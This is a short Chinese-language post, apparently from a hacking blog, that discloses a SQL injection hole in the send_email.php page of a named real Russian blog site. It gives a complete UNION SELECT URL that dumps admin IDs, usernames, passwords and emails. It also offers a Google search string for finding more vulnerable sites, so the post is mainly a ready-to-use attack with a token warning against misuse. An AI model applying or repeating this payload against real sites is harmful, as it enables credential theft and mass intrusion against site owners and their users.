作者：YJPS 转载请注明

近来无聊 去国外网站上转悠，看到一个不错的Blog系统，可以注册用户，并分配一个二级目录。

更无聊的就去检测了下，下面是分析结果。

站点：http://www.jj.ru/

漏洞地址：http://www.jj.ru/include/send_email.php?comment=1074

得到用户和密码

http://www.jj.ru/include/send_email.php?comment=1074+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,id,username,password,email),7,8,9+from+blogs_database.websiteadmin_admin_users+limit+1,1--

如想扩大战果，可GOOGLE里：inurl:send_email.php?comment=

漏洞危害不小，请勿借此破坏。